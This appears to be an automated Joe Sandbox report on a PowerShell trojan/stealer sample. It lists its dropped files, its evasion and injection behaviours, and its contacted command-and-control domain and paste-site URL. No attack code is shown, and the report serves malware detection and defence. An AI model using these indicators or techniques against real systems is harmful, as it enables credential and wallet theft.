              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
              Masquerading              		DCSync1
              Application Window Discovery              		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job121
              Virtualization/Sandbox Evasion              		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt211
              Process Injection              		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
              IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
              Rundll32              		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1565310 Sample: bUAmCazc.ps1 Startdate: 29/11/2024 Architecture: WINDOWS Score: 100 60 rentry.co 2->60 62 balloon-sneak.cyou 2->62 76 Suricata IDS alerts for network traffic 2->76 78 Found malware configuration 2->78 80 Multi AV Scanner detection for submitted file 2->80 84 8 other signatures 2->84 11 powershell.exe 1 226 2->11         started        15 Setup.exe 2->15         started        17 rundll32.exe 2->17         started        signatures3 82 Connects to a pastebin service (likely for C&C) 60->82 process4 file5 52 C:\Users\user\AppData\...\python27.dll, PE32 11->52 dropped 54 C:\Users\user\AppData\Roaming\...\config.prx, PE32 11->54 dropped 56 C:\Users\user\AppData\...\UpdateCommon.dll, PE32 11->56 dropped 58 9 other files (8 malicious) 11->58 dropped 102 Found suspicious powershell code related to unpacking or dynamic code loading 11->102 104 Loading BitLocker PowerShell Module 11->104 106 Powershell drops PE file 11->106 19 Setup.exe 8 11->19         started        23 conhost.exe 11->23         started        108 Overwrites code with unconditional jumps - possibly settings hooks in foreign process 15->108 110 Query firmware table information (likely to detect VMs) 15->110 112 Found direct / indirect Syscall (likely to bypass EDR) 15->112 signatures6 process7 file8 44 C:\Users\user\AppData\...\python27.dll, PE32 19->44 dropped 46 C:\Users\user\AppData\Roaming\...\msvcr90.dll, PE32 19->46 dropped 48 C:\Users\user\AppData\Roaming\...\Setup.exe, PE32+ 19->48 dropped 86 Overwrites code with unconditional jumps - possibly settings hooks in foreign process 19->86 88 Query firmware table information (likely to detect VMs) 19->88 90 Maps a DLL or memory area into another process 19->90 92 3 other signatures 19->92 25 more.com 2 19->25         started        29 Setup.exe 19->29         started        signatures9 process10 file11 50 C:\Users\user\AppData\Local\Temp\eqoamnqfg, PE32 25->50 dropped 94 Writes to foreign memory regions 25->94 96 Found hidden mapped module (file has been removed from disk) 25->96 98 Maps a DLL or memory area into another process 25->98 100 Switches to a custom stack to bypass stack traces 25->100 31 msiexec.exe 1 25->31         started        36 conhost.exe 25->36         started        signatures12 process13 dnsIp14 64 balloon-sneak.cyou 172.67.170.85, 443, 49736, 49737 CLOUDFLARENETUS United States 31->64 66 rentry.co 104.26.2.16, 443, 49806 CLOUDFLARENETUS United States 31->66 42 C:\Users\user\...\B03VAGDV27AOWCK1I.ps1, HTML 31->42 dropped 68 Query firmware table information (likely to detect VMs) 31->68 70 Found many strings related to Crypto-Wallets (likely being stolen) 31->70 72 Tries to harvest and steal browser information (history, passwords, etc) 31->72 74 2 other signatures 31->74 38 powershell.exe 7 31->38         started        file15 signatures16 process17 process18 40 conhost.exe 38->40         started       

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              bUAmCazc.ps116%ReversingLabsScript-PowerShell.Trojan.Powdow

              Dropped Files

              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Local\Temp\eqoamnqfg100%Joe Sandbox ML
              C:\Users\user\AppData\Roaming\Driver\MNCVUBXYFIKB\Setup.exe0%ReversingLabs
              C:\Users\user\AppData\Roaming\Driver\msvcr90.dll0%ReversingLabs
              C:\Users\user\AppData\Roaming\Driver\python27.dll8%ReversingLabs
              C:\Users\user\AppData\Roaming\FeGIPCnK\Data\Updater.ex0%ReversingLabs
              C:\Users\user\AppData\Roaming\FeGIPCnK\Data\d3dcompiler_47.dll0%ReversingLabs
              C:\Users\user\AppData\Roaming\FeGIPCnK\Data\ffmpeg.dll0%ReversingLabs
              C:\Users\user\AppData\Roaming\FeGIPCnK\NAudio.dll0%ReversingLabs
              C:\Users\user\AppData\Roaming\FeGIPCnK\RcClientBase.dll0%ReversingLabs
              C:\Users\user\AppData\Roaming\FeGIPCnK\Resource.ct0%ReversingLabs
              C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exe0%ReversingLabs
              C:\Users\user\AppData\Roaming\FeGIPCnK\UpdateClient.dll0%ReversingLabs
              C:\Users\user\AppData\Roaming\FeGIPCnK\UpdateCommon.dll0%ReversingLabs
              C:\Users\user\AppData\Roaming\FeGIPCnK\config.prx0%ReversingLabs
              C:\Users\user\AppData\Roaming\FeGIPCnK\msvcr90.dll0%ReversingLabs
              C:\Users\user\AppData\Roaming\FeGIPCnK\python27.dll8%ReversingLabs

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              https://chromedevtools.github.io/devtools-protocol/tot/$0%Avira URL Cloudsafe
              https://balloon-sneak.cyou/_(0%Avira URL Cloudsafe
              https://balloon-sneak.cyou/api0%Avira URL Cloudsafe
              http://myserver.corp.contoso.com/0%Avira URL Cloudsafe
              https://balloon-sneak.cyou:443/api0%Avira URL Cloudsafe
              https://www.chromestatus.com/feature/56297098240327680%Avira URL Cloudsafe
              https://balloon-sneak.cyou/apiP0%Avira URL Cloudsafe
              https://balloon-sneak.cyou/0%Avira URL Cloudsafe
              https://balloon-sneak.cyou/apim0%Avira URL Cloudsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              rentry.co
              		104.26.2.16
              		truefalse
                		high
                balloon-sneak.cyou
                		172.67.170.85
                		truetrue
                  		unknown

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  https://balloon-sneak.cyou/apitrue
                  • Avira URL Cloud: safe
                  		unknown
                  https://rentry.co/feouewe5/rawfalse
                    		high

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    https://duckduckgo.com/chrome_newtabmsiexec.exe, 0000000B.00000003.2262184534.0000000005F3A000.00000004.00000001.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000003.2262352829.0000000005F3A000.00000004.00000001.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000003.2262110510.0000000005F3C000.00000004.00000001.00020000.00000000.sdmpfalse
                      		high
                      http://repository.certum.pl/ctsca2021.cer0Apowershell.exe, 00000000.00000002.1992948747.000001AD68015000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        http://crl.certum.pl/ctsca2021.crl0opowershell.exe, 00000000.00000002.1992948747.000001AD68015000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          https://duckduckgo.com/ac/?q=msiexec.exe, 0000000B.00000003.2262184534.0000000005F3A000.00000004.00000001.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000003.2262352829.0000000005F3A000.00000004.00000001.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000003.2262110510.0000000005F3C000.00000004.00000001.00020000.00000000.sdmpfalse
                            		high
                            http://www.vmware.com/0Setup.exe, 00000003.00000002.1937686145.0000000002CFB000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000007.00000002.2189552359.000000000522F000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2580918352.00000000050A6000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 0000000C.00000002.2210831777.0000000002DCB000.00000004.00000020.00020000.00000000.sdmpfalse
                              		high
                              http://crl.microsoftmsiexec.exe, 0000000B.00000003.2506550494.00000000033F7000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2580282480.00000000033F9000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high
                                https://chromedevtools.github.io/devtools-protocol/tot/$devtools_resources.pak.0.drfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://developers.google.com/web/tools/chrome-devtools/network/?utm_source=devtools&utm_campaign=20devtools_resources.pak.0.drfalse
                                  		high
                                  https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.msiexec.exe, 0000000B.00000003.2351013870.0000000005F04000.00000004.00000001.00020000.00000000.sdmpfalse
                                    		high
                                    http://ocsp.digicert.cSetup.exe, 00000003.00000002.1937585678.0000000002BAD000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 0000000C.00000002.2210763818.0000000002C76000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      https://developers.google.com/web/tools/lighthouse/devtools_resources.pak.0.drfalse
                                        		high
                                        https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=msiexec.exe, 0000000B.00000003.2262184534.0000000005F3A000.00000004.00000001.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000003.2262352829.0000000005F3A000.00000004.00000001.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000003.2262110510.0000000005F3C000.00000004.00000001.00020000.00000000.sdmpfalse
                                          		high
                                          https://developers.google.com/web/fundamentals/accessibility/accessible-styles#color_and_contrastdevtools_resources.pak.0.drfalse
                                            		high
                                            https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17msiexec.exe, 0000000B.00000003.2262938227.0000000005F4F000.00000004.00000001.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000003.2263146054.0000000005F48000.00000004.00000001.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000003.2302839123.0000000005F48000.00000004.00000001.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000003.2263003093.0000000005F48000.00000004.00000001.00020000.00000000.sdmpfalse
                                              		high
                                              http://contoso.com/rdweb/Feed/webfeed.aspx.powershell.exe, 00000000.00000002.1992948747.000001AD675A7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                https://balloon-sneak.cyou/_(msiexec.exe, 0000000B.00000002.2580158081.0000000003378000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://developers.google.com/web/tools/chrome-devtools/devtools_resources.pak.0.drfalse
                                                  		high
                                                  https://support.google.com/chrome/?p=datasaverdevtools_resources.pak.0.drfalse
                                                    		high
                                                    https://rentry.co/feouewe5/rawZmsiexec.exe, 0000000B.00000003.2578964271.00000000033AE000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2580282480.00000000033AE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://github.com/WICG/webpackagedevtools_resources.pak.0.drfalse
                                                        		high
                                                        https://aka.ms/pscore6lBpowershell.exe, 0000000E.00000002.2588541617.0000000004D51000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYimsiexec.exe, 0000000B.00000003.2351013870.0000000005F04000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://subca.ocsp-certum.com05powershell.exe, 00000000.00000002.1992948747.000001AD68015000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://x1.c.lencr.org/0msiexec.exe, 0000000B.00000003.2348764424.0000000005F37000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://x1.i.lencr.org/0msiexec.exe, 0000000B.00000003.2348764424.0000000005F37000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Installmsiexec.exe, 0000000B.00000003.2263003093.0000000005F23000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://subca.ocsp-certum.com02powershell.exe, 00000000.00000002.1992948747.000001AD68015000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchmsiexec.exe, 0000000B.00000003.2262184534.0000000005F3A000.00000004.00000001.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000003.2262352829.0000000005F3A000.00000004.00000001.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000003.2262110510.0000000005F3C000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://docs.google.com/forms/d/e/1FAIpQLSchz2FdcQ-rRllzl8BbhWaTRRY-12BpPjW6Hr9e1-BpCA083w/viewformdevtools_resources.pak.0.drfalse
                                                                          		high
                                                                          http://subca.ocsp-certum.com01powershell.exe, 00000000.00000002.1992948747.000001AD68015000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            http://crl.certum.pl/ctnca2.crl0lpowershell.exe, 00000000.00000002.1992948747.000001AD68015000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              http://repository.certum.pl/ctnca2.cer09powershell.exe, 00000000.00000002.1992948747.000001AD68015000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://developers.google.com/chrome-developer-tools/docs/remote-debuggingdevtools_resources.pak.0.drfalse
                                                                                  		high
                                                                                  https://nodejs.org/static/images/logos/nodejs-new-pantone-black.pngdevtools_resources.pak.0.drfalse
                                                                                    		high
                                                                                    https://developers.google.com/web/fundamentals/engage-and-retain/web-app-manifest/?utm_source=devtoodevtools_resources.pak.0.drfalse
                                                                                      		high
                                                                                      https://support.mozilla.org/products/firefoxgro.allmsiexec.exe, 0000000B.00000003.2350393961.000000000600F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000000.00000002.1992948747.000001AD668B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2588541617.0000000004D51000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          http://www.certum.pl/CPS0powershell.exe, 00000000.00000002.1992948747.000001AD68015000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94msiexec.exe, 0000000B.00000003.2351013870.0000000005F04000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              http://python.org/dev/peps/pep-0263/Setup.exe, 0000000C.00000002.2211304501.000000006AE0A000.00000002.00000001.01000000.0000000A.sdmpfalse
                                                                                                		high
                                                                                                http://myserver.corp.contoso.com/nca.adml.0.drfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                		unknown
                                                                                                https://aka.ms/winsvr-2022-pshelppowershell.exe, 00000000.00000002.1992948747.000001AD66AD9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://chrome-devtools-frontend.appspot.comdevtools_resources.pak.0.drfalse
                                                                                                    		high
                                                                                                    http://repository.certum.pl/ctnca.cer09powershell.exe, 00000000.00000002.1992948747.000001AD68015000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpgmsiexec.exe, 0000000B.00000003.2351013870.0000000005F04000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://www.google.com/images/branding/product/ico/googleg_lodp.icomsiexec.exe, 0000000B.00000003.2262184534.0000000005F3A000.00000004.00000001.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000003.2262352829.0000000005F3A000.00000004.00000001.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000003.2262110510.0000000005F3C000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000000.00000002.1992948747.000001AD66AD9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000000.00000002.1992948747.000001AD66AD9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              http://crl.certum.pl/ctnca.crl0kpowershell.exe, 00000000.00000002.1992948747.000001AD68015000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000000.00000002.1992948747.000001AD66AD9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://developers.google.com/web/tools/chrome-devtools/sources?utm_source=devtools&utm_campaign=201devtools_resources.pak.0.drfalse
                                                                                                                    		high
                                                                                                                    http://crl3.digicerSetup.exe, 00000003.00000002.1937585678.0000000002BAD000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 0000000C.00000002.2210763818.0000000002C76000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      https://balloon-sneak.cyou/msiexec.exe, 0000000B.00000002.2580158081.0000000003378000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000003.2579037828.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000003.2396539697.0000000005EFF000.00000004.00000001.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000003.2506550494.00000000033FC000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                      • Avira URL Cloud: safe
                                                                                                                      		unknown
                                                                                                                      http://www.vmware.com/0/Setup.exe, 00000003.00000002.1937686145.0000000002CFB000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000007.00000002.2189552359.000000000522F000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2580918352.00000000050A6000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 0000000C.00000002.2210831777.0000000002DCB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=msiexec.exe, 0000000B.00000003.2262184534.0000000005F3A000.00000004.00000001.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000003.2262352829.0000000005F3A000.00000004.00000001.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000003.2262110510.0000000005F3C000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          https://rentry.co/emsiexec.exe, 0000000B.00000002.2580282480.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000003.2579037828.00000000033FC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            http://crl.rootca1.amazontrust.com/rootca1.crl0msiexec.exe, 0000000B.00000003.2348764424.0000000005F37000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&ctamsiexec.exe, 0000000B.00000003.2351013870.0000000005F04000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                http://ocsp.rootca1.amazontrust.com0:msiexec.exe, 0000000B.00000003.2348764424.0000000005F37000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  https://balloon-sneak.cyou:443/apimsiexec.exe, 0000000B.00000003.2506746140.00000000033A3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                  		unknown
                                                                                                                                  https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016msiexec.exe, 0000000B.00000003.2262938227.0000000005F4F000.00000004.00000001.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000003.2263146054.0000000005F48000.00000004.00000001.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000003.2302839123.0000000005F48000.00000004.00000001.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000003.2263003093.0000000005F48000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    https://www.certum.pl/CPS0powershell.exe, 00000000.00000002.1992948747.000001AD68015000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      https://www.ecosia.org/newtab/msiexec.exe, 0000000B.00000003.2262184534.0000000005F3A000.00000004.00000001.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000003.2262352829.0000000005F3A000.00000004.00000001.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000003.2262110510.0000000005F3C000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        http://c0rl.m%LSetup.exe, 0000000C.00000002.2210763818.0000000002C76000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          http://www.symauth.com/cps0(Setup.exe, 00000003.00000002.1937686145.0000000002CFB000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000007.00000002.2189552359.000000000522F000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2580918352.00000000050A6000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 0000000C.00000002.2210831777.0000000002DCB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brmsiexec.exe, 0000000B.00000003.2350393961.000000000600F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              https://github.com/Pester/Pesterpowershell.exe, 00000000.00000002.1992948747.000001AD66AD9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                https://ac.ecosia.org/autocomplete?q=msiexec.exe, 0000000B.00000003.2262184534.0000000005F3A000.00000004.00000001.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000003.2262352829.0000000005F3A000.00000004.00000001.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000003.2262110510.0000000005F3C000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  https://developers.google.com/web/tools/lighthouse/)devtools_resources.pak.0.drfalse
                                                                                                                                                    		high
                                                                                                                                                    https://nodejs.org/en/docs/inspector/devtools_resources.pak.0.drfalse
                                                                                                                                                      		high
                                                                                                                                                      https://www.chromestatus.com/feature/5629709824032768devtools_resources.pak.0.drfalse
                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                      		unknown
                                                                                                                                                      https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpgmsiexec.exe, 0000000B.00000003.2351013870.0000000005F04000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                        		high
                                                                                                                                                        http://www.symauth.com/rpa00Setup.exe, 00000003.00000002.1937686145.0000000002CFB000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000007.00000002.2189552359.000000000522F000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2580918352.00000000050A6000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 0000000C.00000002.2210831777.0000000002DCB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          		high
                                                                                                                                                          https://rentry.co/msiexec.exe, 0000000B.00000003.2579037828.00000000033FC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            		high
                                                                                                                                                            https://balloon-sneak.cyou/apiPmsiexec.exe, 0000000B.00000003.2571882490.000000000341F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2580443477.000000000341F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                            		unknown
                                                                                                                                                            https://support.microsofmsiexec.exe, 0000000B.00000003.2262938227.0000000005F51000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                              		high
                                                                                                                                                              http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000000.00000002.1992948747.000001AD66AD9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                		high
                                                                                                                                                                http://crt.rootca1.amazontrust.com/rootca1.cer0?msiexec.exe, 0000000B.00000003.2348764424.0000000005F37000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                  		high
                                                                                                                                                                  http://www.info-zip.org/Setup.exe, 00000003.00000002.1937686145.0000000002CA5000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000007.00000002.2189552359.00000000051E6000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2580918352.000000000505D000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 0000000C.00000002.2210831777.0000000002D75000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    		high
                                                                                                                                                                    https://developers.google.comdevtools_resources.pak.0.drfalse
                                                                                                                                                                      		high
                                                                                                                                                                      https://aka.ms/pscore68powershell.exe, 00000000.00000002.1992948747.000001AD668B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                        		high
                                                                                                                                                                        https://developers.google.com/web/tools/chrome-devtools/progressive-web-apps#opaque-responsesdevtools_resources.pak.0.drfalse
                                                                                                                                                                          		high
                                                                                                                                                                          https://balloon-sneak.cyou/apimmsiexec.exe, 0000000B.00000003.2439380728.000000000341F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                          		unknown
                                                                                                                                                                          https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examplesmsiexec.exe, 0000000B.00000003.2263003093.0000000005F23000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                            		high
                                                                                                                                                                            https://developer.chrome.com/devtools/docs/remote-debugging#port-forwardingdevtools_resources.pak.0.drfalse
                                                                                                                                                                              		high
                                                                                                                                                                              https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=msiexec.exe, 0000000B.00000003.2262184534.0000000005F3A000.00000004.00000001.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000003.2262352829.0000000005F3A000.00000004.00000001.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000003.2262110510.0000000005F3C000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                		high
                                                                                                                                                                                http://crl3.dSetup.exe, 00000003.00000002.1937585678.0000000002BAD000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 0000000C.00000002.2210763818.0000000002C76000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  		high

                                                                                                                                                                                  World Map of Contacted IPs

                                                                                                                                                                                  • No. of IPs < 25%
                                                                                                                                                                                  • 25% < No. of IPs < 50%
                                                                                                                                                                                  • 50% < No. of IPs < 75%
                                                                                                                                                                                  • 75% < No. of IPs

                                                                                                                                                                                  Public IPs

                                                                                                                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                  104.26.2.16
                                                                                                                                                                                  		rentry.coUnited States
                                                                                                                                                                                  		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                  172.67.170.85
                                                                                                                                                                                  		balloon-sneak.cyouUnited States
                                                                                                                                                                                  		13335CLOUDFLARENETUStrue

                                                                                                                                                                                  General Information

                                                                                                                                                                                  Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                  Analysis ID:1565310
                                                                                                                                                                                  Start date and time:2024-11-29 15:44:08 +01:00
                                                                                                                                                                                  Joe Sandbox product:CloudBasic
                                                                                                                                                                                  Overall analysis duration:0h 9m 43s
                                                                                                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                                                                                                  Report type:full
                                                                                                                                                                                  Cookbook file name:default.jbs
                                                                                                                                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                  Number of analysed new started processes analysed:16
                                                                                                                                                                                  Number of new started drivers analysed:0
                                                                                                                                                                                  Number of existing processes analysed:0
                                                                                                                                                                                  Number of existing drivers analysed:0
                                                                                                                                                                                  Number of injected processes analysed:0
                                                                                                                                                                                  Technologies:
                                                                                                                                                                                  • HCA enabled
                                                                                                                                                                                  • EGA enabled
                                                                                                                                                                                  • AMSI enabled
                                                                                                                                                                                  Analysis Mode:default
                                                                                                                                                                                  Analysis stop reason:Timeout
                                                                                                                                                                                  Sample name:bUAmCazc.ps1
                                                                                                                                                                                  Detection:MAL
                                                                                                                                                                                  Classification:mal100.troj.spyw.evad.winPS1@16/213@2/2
                                                                                                                                                                                  EGA Information:
                                                                                                                                                                                  • Successful, ratio: 50%
                                                                                                                                                                                  HCA Information:
                                                                                                                                                                                  • Successful, ratio: 96%
